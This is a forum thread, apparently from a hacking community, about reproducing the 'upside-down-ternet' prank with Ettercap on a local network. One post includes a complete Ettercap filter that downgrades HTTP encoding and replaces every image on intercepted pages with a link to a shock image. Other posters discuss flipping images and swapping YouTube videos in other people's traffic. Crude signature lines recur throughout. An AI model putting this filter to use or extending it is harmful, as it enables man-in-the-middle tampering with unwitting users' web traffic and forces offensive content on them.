http://www.ex-parrot.com/~pete/upside-down-ternet.html
Is there anyway to do this with an Ettercap filter? I understand it's being routed to a squid server and then the image is fubarred and sent back to the local network. But I think if it was put in an Ettercap filter that would be absolutely awesome!
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
Tubgirl is worse. By far.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
already made.
Code:############################################################################ # # # Jolly Pwned -- ig.filter -- filter source file # # # # By Irongeek. based on code from ALoR & NaGA # # Along with some help from Kev and jon.dmml # # http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833 # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=\"http://goatse.cz/hello.jpg\" "); replace("IMG SRC=", "img src=\"http://goatse.cz/hello.jpg\" "); msg("Filter Ran.\n"); }
But if anyone can create something to make images upside down, I could have some fun with that haha
Another thing I've been trying to do is setting up a filter so it replaces all youtube videos with a single youtube video of my choosing. I've tried to code something to do that using the source code in a youtube page, but I'm very new to coding (I used to be able to do HTML but that was years ago)
jpegtran flip them upside down. I was going to port it to my wrt54gs but lost interest after fighting with squid proxy.
<---fighting with Squid Proxy now. I think it would be funny to flip images, make pages blurry. it does seem like a lot of trouble to do that though. there's got to be a better way. So far, Squid is a pain in the a$$. Has a Novel sized .Conf file.
I felt like bending the bars back, and ripping out the window frames and eating them. yes, eating them! Leaping, leaping, leaping! Colonics for everyone! All right! You dumb*sses. I'm a mental patient. I'm *supposed* to act out!
This must be possible to do with ettercap filters. You can use the command 'mogrify -flip %image' to flip images vertically and it already built into BT2. Just need to make a way of forwarding the images on and make sure there is no lag. Simple![]()
Does anyone have the link to the EDU on making a page blurry? I read it before but I don't know where it is now
Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69